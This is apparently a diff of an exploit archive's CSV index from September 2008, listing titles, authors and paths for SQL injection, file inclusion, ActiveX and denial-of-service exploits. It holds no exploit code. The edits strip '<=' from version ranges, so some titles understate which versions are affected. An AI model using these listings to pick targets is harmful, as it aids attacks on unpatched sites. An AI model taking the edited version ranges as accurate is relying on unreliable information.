6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 6386,platforms/windows/dos/6386.html,"Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit",2008-09-05,Metacortex,windows,dos,0 6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server Remote Stack Buffer Overflow Exploit (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 @@ -5973,28 +5973,28 @@ id,file,description,date,author,platform,type,port 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local .M3U File Stack Buffer Overflow Exploit",2008-09-06,"fl0 fl0w",windows,local,0 6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service Exploit",2008-09-06,LiquidWorm,windows,dos,0 -6392,platforms/php/webapps/6392.php,"Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (Win32)",2008-09-06,Raz0r,php,webapps,0 -6393,platforms/php/webapps/6393.pl,"MemHT Portal <= 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 +6392,platforms/php/webapps/6392.php,"Simple Machines Forum 1.1.5 Admin Reset Password Exploit (Win32)",2008-09-06,Raz0r,php,webapps,0 +6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC",2008-09-07,"Alex Hernandez",hardware,dos,0 -6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module <= 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 -6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum (cat) Remote SQL Injection",2008-09-07,r45c4l,php,webapps,0 +6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 +6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum (cat) SQL Injection",2008-09-07,r45c4l,php,webapps,0 6397,platforms/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script - (search_results.php) SQL Injection",2008-09-07,Mormoroth,php,webapps,0 -6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum (catid) Remote SQL Injection",2008-09-09,r45c4l,php,webapps,0 +6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum (catid) SQL Injection",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injection Vulnerabilities",2008-09-09,"Khashayar Fereidani",php,webapps,0 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - (report.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6404,platforms/php/webapps/6404.txt,"Live TV Script (index.php mid) SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 -6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - (sideid) Remote SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 +6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - (sideid) SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0 -6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection",2008-09-09,"security fears team",php,webapps,0 +6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) SQL Injection",2008-09-09,"security fears team",php,webapps,0 6409,platforms/php/webapps/6409.txt,"Availscript Article Script - (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps,0 6411,platforms/php/webapps/6411.txt,"Availscript Photo Album - (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection",2008-09-09,Stack,php,webapps,0 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 -6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 - (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0 +6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - (Cookie) SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script - (jid) SQL Injection (Auth)",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 @@ -6017,33 +6017,33 @@ id,file,description,date,author,platform,type,port 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - (COOKIE) Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Remote File Upload",2008-09-12,Stack,php,webapps,0 6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Remote Blind SQL Injection Exploit",2008-09-12,ka0x,php,webapps,0 -6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) Remote SQL Injection",2008-09-12,tmh,php,webapps,0 -6443,platforms/php/webapps/6443.pl,"WebPortal CMS <= 0.7.4 - (download.php aid) SQL Injection Exploit",2008-09-12,StAkeR,php,webapps,0 -6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) Remote SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) SQL Injection",2008-09-12,tmh,php,webapps,0 +6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - (download.php aid) SQL Injection Exploit",2008-09-12,StAkeR,php,webapps,0 +6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) SQL Injection",2008-09-12,r45c4l,php,webapps,0 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Remote Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0 -6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 - (cat_id) SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 -6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) Remote SQL Injection",2008-09-12,r45c4l,php,webapps,0 -6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 +6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - (cat_id) SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 +6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - (fckeditor) Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (LFI/SQL) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 -6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) Remote SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 +6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX BoF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 -6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) Remote SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 +6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f RETR Denial of Service Exploit",2008-09-14,Shinnok,windows,dos,0 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos,0 -6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities",2008-09-14,~!Dok_tOR!~,php,webapps,0 -6461,platforms/php/webapps/6461.txt,"Cpanel <= 11.x - (Fantastico) LFI (sec Bypass)",2008-09-14,joker_1,php,webapps,0 -6462,platforms/php/webapps/6462.pl,"CzarNews <= 1.20 - (Cookie) Remote SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0 +6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite SQL Injection Vulnerabilities",2008-09-14,~!Dok_tOR!~,php,webapps,0 +6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - (Fantastico) LFI (sec Bypass)",2008-09-14,joker_1,php,webapps,0 +6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - (Cookie) SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0 6463,platforms/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel DoS (Metasploit)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0 -6464,platforms/php/webapps/6464.txt,"CzarNews <= 1.20 - (Account Hijacking) Remote SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 +6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - (Account Hijacking) SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings (search.php c) SQL Injection",2008-09-15,JosS,php,webapps,0 -6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-09-15,SirGod,php,webapps,0 -6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex (produid) Remote SQL Injection",2008-09-16,SirGod,php,webapps,0 -6468,platforms/php/webapps/6468.txt,"attachmax dolphin <= 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 +6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injection Vulnerabilities",2008-09-15,SirGod,php,webapps,0 +6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0 +6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - (index.php) SQL Injection",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel reservation System (city.asp city) Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / ITunes 8.0 - Remote off by one Crash Exploit",2008-09-16,securfrog,multiple,dos,0 @@ -6056,10 +6056,10 @@ id,file,description,date,author,platform,type,port 6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"x10media mp3 search engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,dos,0 -6482,platforms/php/webapps/6482.txt,"addalink <= 4 Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 -6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) Remote SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 -6485,platforms/php/webapps/6485.txt,"addalink <= 4 - (category_id) Remote SQL Injection",2008-09-18,ka0x,php,webapps,0 -6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) Remote SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 +6482,platforms/php/webapps/6482.txt,"addalink 4 Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 +6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 +6485,platforms/php/webapps/6485.txt,"addalink 4 - (category_id) SQL Injection",2008-09-18,ka0x,php,webapps,0 +6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site (picture_category.php id) SQL Injection",2008-09-18,SarBoT511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS (template) Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 @@ -6067,24 +6067,24 @@ id,file,description,date,author,platform,type,port 6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK ActiveX (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 - (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() - Remote Denial of Service Exploit",2008-09-19,"Jeremy Brown",linux,dos,0 -6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - (detail.php) Remote SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 -6495,platforms/php/webapps/6495.txt,"Explay CMS <= 2.1 Persistent XSS and CSRF",2008-09-19,hodik,php,webapps,0 +6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - (detail.php) SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 +6495,platforms/php/webapps/6495.txt,"Explay CMS 2.1 Persistent XSS and CSRF",2008-09-19,hodik,php,webapps,0 6496,platforms/windows/dos/6496.c,"DESlock+ <= 3.2.7 - Local Kernel Overflow PoC",2008-09-20,mu-b,windows,dos,0 6497,platforms/windows/dos/6497.c,"DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 6498,platforms/windows/dos/6498.c,"DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 -6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum <= 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 -6500,platforms/php/webapps/6500.txt,"Explay CMS <= 2.1 Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 -6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - (index.php page) Remote SQL Injection",2008-09-20,0x90,php,webapps,0 -6502,platforms/php/webapps/6502.txt,"Diesel Pay Script (area) Remote SQL Injection",2008-09-20,ZoRLu,php,webapps,0 -6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) Remote SQL Injection",2008-09-20,r45c4l,php,webapps,0 -6504,platforms/php/webapps/6504.txt,"Oceandir <= 2.9 - (show_vote.php id) Remote SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 -6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - (humor.php id) Remote SQL Injection",2008-09-20,r45c4l,php,webapps,0 +6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 +6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 +6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - (index.php page) SQL Injection",2008-09-20,0x90,php,webapps,0 +6502,platforms/php/webapps/6502.txt,"Diesel Pay Script (area) SQL Injection",2008-09-20,ZoRLu,php,webapps,0 +6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) SQL Injection",2008-09-20,r45c4l,php,webapps,0 +6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - (show_vote.php id) SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 +6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - (humor.php id) SQL Injection",2008-09-20,r45c4l,php,webapps,0 6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Remote Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 -6507,platforms/php/webapps/6507.php,"Invision Power Board <= 2.3.5 - Remote SQL Injection Exploit",2008-09-21,waraxe,php,webapps,0 -6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - Remote SQL Injection",2008-09-21,0x90,php,webapps,0 -6509,platforms/cgi/webapps/6509.txt,"TWiki <= 4.2.2 - (action) Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 -6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities",2008-09-21,d3v1l,php,webapps,0 -6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) Remote SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6507,platforms/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection Exploit",2008-09-21,waraxe,php,webapps,0 +6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0 +6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - (action) Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 +6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional Multiple SQL Injection Vulnerabilities",2008-09-21,d3v1l,php,webapps,0 +6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add-Admin",2008-09-21,"CWH Underground",php,webapps,0 6514,platforms/php/webapps/6514.txt,"Availscript Jobs Portal Script - File Upload (Auth)",2008-09-21,InjEctOr5,php,webapps,0 @@ -6092,194 +6092,194 @@ id,file,description,date,author,platform,type,port 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"NetArtMedia Jobs Portal 1.3 - Multiple SQL Injection Vulnerabilities",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 6518,platforms/php/webapps/6518.txt,"NetArtMedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 -6519,platforms/php/webapps/6519.php,"PHP iCalendar <= 2.24 - (cookie_language) LFI / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 +6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) LFI / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 6522,platforms/php/webapps/6522.txt,"Availscript Article Script (view.php v) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6523,platforms/php/webapps/6523.php,"WCMS 1.0b Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 -6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) Remote SQL Injection",2008-09-22,d3v1l,php,webapps,0 +6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 -6526,platforms/php/webapps/6526.txt,"PHP iCalendar <= 2.24 Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 -6527,platforms/php/webapps/6527.txt,"BuzzyWall <= 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 -6528,platforms/php/webapps/6528.txt,"WCMS 1.0b (news_detail.asp id) Remote SQL Injection",2008-09-22,"CWH Underground",php,webapps,0 +6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 +6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 +6528,platforms/php/webapps/6528.txt,"WCMS 1.0b (news_detail.asp id) SQL Injection",2008-09-22,"CWH Underground",php,webapps,0 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P (comments.php) Blind SQL Injection Exploit",2008-09-22,Stack,php,webapps,0 -6530,platforms/php/webapps/6530.txt,"OpenElec <= 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 -6531,platforms/php/webapps/6531.txt,"MyBlog <= 0.9.8 Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 +6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 +6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 -6533,platforms/php/webapps/6533.txt,"basebuilder <= 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 -6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) Remote SQL Injection",2008-09-22,d3v1l,php,webapps,0 -6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus <= 1.0.4 Cookie Remote SQL Injection Exploit",2008-09-22,-SmoG-,php,webapps,0 +6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 +6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 +6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 Cookie SQL Injection Exploit",2008-09-22,-SmoG-,php,webapps,0 6537,platforms/windows/remote/6537.html,"Chilkat XML ActiveX Remote Arbitrary File Creation/Execution Exploit",2008-09-23,shinnai,windows,remote,0 -6538,platforms/php/webapps/6538.txt,"OpenRat <= 0.8-beta4 - (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 -6539,platforms/php/webapps/6539.txt,"Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 -6540,platforms/php/webapps/6540.pl,"iGaming CMS <= 1.5 - Multiple Remote SQL Injection Exploit",2008-09-23,StAkeR,php,webapps,0 -6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS <= 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0 +6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 +6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 +6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injection Exploit",2008-09-23,StAkeR,php,webapps,0 +6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0 6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software (sayfa.php kat) SQL Injection",2008-09-23,d3v1l,php,webapps,0 6543,platforms/php/webapps/6543.txt,"Ol Bookmarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0 -6544,platforms/php/webapps/6544.txt,"WebPortal CMS <= 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 -6545,platforms/php/webapps/6545.txt,"Hotscripts Clone (cid) Remote SQL Injection",2008-09-24,"Hussin X",php,webapps,0 +6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 +6545,platforms/php/webapps/6545.txt,"Hotscripts Clone (cid) SQL Injection",2008-09-24,"Hussin X",php,webapps,0 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin Exploit",2008-09-24,ka0x,php,webapps,0 6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 - RFI / LFI / SQL Injection Vulnerabilities",2008-09-24,GoLd_M,php,webapps,0 6548,platforms/windows/remote/6548.html,"BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 -6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0 +6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0 -6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0 -6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0 +6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0 +6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0 6554,platforms/windows/dos/6554.html,"Google Chrome Browser Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - (recruit_details.php) SQL Injection",2008-09-24,r45c4l,php,webapps,0 6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 -6557,platforms/php/webapps/6557.txt,"ADN Forum <= 1.0b Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 -6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 +6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 +6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0 -6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0 -6564,platforms/php/webapps/6564.txt,"Vikingboard <= 0.2 Beta (task) Local File 